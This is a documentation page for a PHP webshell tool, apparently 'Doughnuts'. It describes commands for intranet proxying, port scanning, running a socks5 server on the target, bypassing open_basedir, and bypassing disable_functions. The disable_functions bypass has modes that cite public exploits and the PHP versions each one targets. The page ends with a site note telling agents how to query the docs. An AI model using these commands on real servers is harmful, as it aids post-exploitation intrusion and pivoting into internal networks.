# OTHER

![](/files/-MC0IaUijtAk9XGIBBBr)

###

### 命令

#### ag/agent

```
    Lightweight intranet browsing.

    eg: agent {url} {method} {data=''} {params=''} {cookie=''} {type=[socket|file_get_contents|curl]{1|2|3},default = 1} {timeout=3} {redirect_method=POST} {redirect_auto=1} {redirect_cookie_use=1} {create_dir=0}
    
    Command Args:
        -u,--url(*)                 [str] url

        -m,--method(*)              [str] method

        -d,--data                   [str] data (Default: '')

        -p,--params                 [str] params (Default: '')

        -c,--cookie                 [str] cookie (Default: '')

        -t,--type                   [int] type (Default: 1)

        -to,--timeout               [float] timeout (Default: 3)

        -re_m,--redirect_method        [str] redirect_method (Default: 'POST')

        --redirect_auto             [int] redirect_auto (Default: 1)

        --redirect_cookie_use        [int] redirect_cookie_use (Default: 1)

        --create_dir                [int] create_dir (Default: 0)
        
```

轻量级的内网浏览，以php作为基础，具有以下特征：

* 请求方法：

  * 可选定代理首次请求的请求方法
  * 可选定代理浏览过程中重定向的请求方法

* 请求参数：

  * 目前仅支持自定义GET以及简单的POST的请求参数
  * POST请求参数会一直跟随重定向请求直到最后一个页面

* COOKIE管理：

  * 可选定代理首次请求的COOKIE内容
  * 可选定代理浏览过程中重定向时是否使用COOKIE

* 代理方式：

  * socket： 使用php的socket函数进行内网浏览
  * file\_get\_contents：使用php的file\_get\_contents函数进行内网浏览
  * curl：使用php的curl函数进行内网浏览

* 本地生成：

  * 支持在本地新建内网浏览的得到的网页内容

命令格式为`agent -u{首次请求的URL} -m{首次请求的请求方法} -d{请求时的POST请求参数内容} -p{首次请求的GET参数内容} -c{首次请求所携带的COOKIE} -t{代理的方法（socket|file_get_contents|curl）} -to{超时时间} -re_m{重定向的请求方法} --redirect_auto{是否允许重定向} --redirect_cookie_use{重定向是否使用COOKIE} --create_dir{是否在本地保存最后浏览到的网页的内容}`

#### bobd

```
    bobd

    (Only for *unix) Try to bypass open_basedir by ini_set and chdir.
        
```

尝试使用`ini_set`绕过`open_basedir`限制。

#### bdf

```
    bdf

    Try to bypass disable_functions by php7-backtrace-bypass.

    Mode -1 / Mode close:

        Close bdf

    Mode auto:

        Automatically filter and test all bdf modes

    Mode 0:

        Display the current bdf mode

    Mode 1 php7-backtrace(Only for php7.0-7.4 and *unix) :

        Origin:
        - https://github.com/mm0r1/exploits/tree/master/php7-backtrace-bypass

        Targets:
        - 7.0 - all versions to date
        - 7.1 - all versions to date
        - 7.2 - all versions to date
        - 7.3 < 7.3.15 (released 20 Feb 2020)
        - 7.4 < 7.4.3 (released 20 Feb 2020)

    Mode 2 php7-gc(Only for php7.0-7.3 and *unix) :

        Origin:
        - https://github.com/mm0r1/exploits/tree/master/php7-gc-bypass

        Targets:
        - 7.0 - all versions to date
        - 7.1 - all versions to date
        - 7.2 - all versions to date
        - 7.3 - all versions to date

    Mode 3 php7-json(Only for php7.1-7.3):

        Origin:
        - https://github.com/mm0r1/exploits/tree/master/php-json-bypass

        Targets:
        - 7.1 - all versions to date
        - 7.2 < 7.2.19 (released 30 May 2019)
        - 7.3 < 7.3.6 (released 30 May 2019)

    Mode 4 LD_PRELOAD(Only for *unix):

        Need:
        - putenv, mail/error_log/mb_send_mail/imap_email fucntions enabled

    Mode 5 FFI(Only for *unix and php >= 7.4):

        Author:
        - MorouU

        Need:
        - FFI extension

    Mode 6 COM(Only for windows):

        Need:
        - com_dotnet extension

    Mode 7 imap_open:

        Need:
        - imap extension

    
    Command Args:
        -m,--mode                   [str] mode (Default: '0')
        
```

支持多种方式绕过`disable_functions`的限制，根据所传`mode`数参数自动调用以下功能：

* mode = 0：显示当前绕过`disable_functions`的模式。
* mode = auto：自动绕过`disable_functions`。
* mode = 1：使用`php-acktrace`绕过`disable_functions`。
* mode = 2：使用`php-gc`绕过`disable_functions`。
* mode = 3：使用`php-json`绕过`disable_functions`。
* mode = 4：使用`LD_PRELOAD`绕过`disable_functions`。
* mode = 5：使用`FFI`绕过`disable_functions`。
* mode = 6：使用`COM`绕过`disable_functions`。
* mode = 7：使用`imap_open`绕过`disable_functions`。

命令格式为`bdf -m {模式选项}`。

#### ps/protscan

```
    portscan

    Scan intranet ports.

    eg: portscan {ip} {ports} {type=[socket|file_get_contents|curl]{1|2|3},default = 2} {timeout=0.5}
    
    Command Args:
        --ip(*)                     [str] ip

        -p,--ports(*)               [str] ports

        -t,--type                   [int] type (Default: 2)

        -to,--timeout               [float] timeout (Default: 0.5)

```

以php作为基础，对指定的IP进行端口扫描，支持`socket file_get_contents curl`扫描方式。格式为`portscan {IP} {扫描范围(??|?-??,??|??,??...)} {扫描类型(socket|file_get_contents|curl)} {超时时间}`

#### socks

```
    socks

    (Only for *unix) Run a socks5 server on the target system by python.

    eg: socks {port=8888}
    
    Command Args:
        --port                      [int] port (Default: 8888)
        
```

在目标机子上开启一个socks5服务器，要求目标机子必须拥有python环境。格式为`socks {端口号}`。


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://doughnuts3.gitbook.io/doughnuts/jin-jie/webshell/other.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.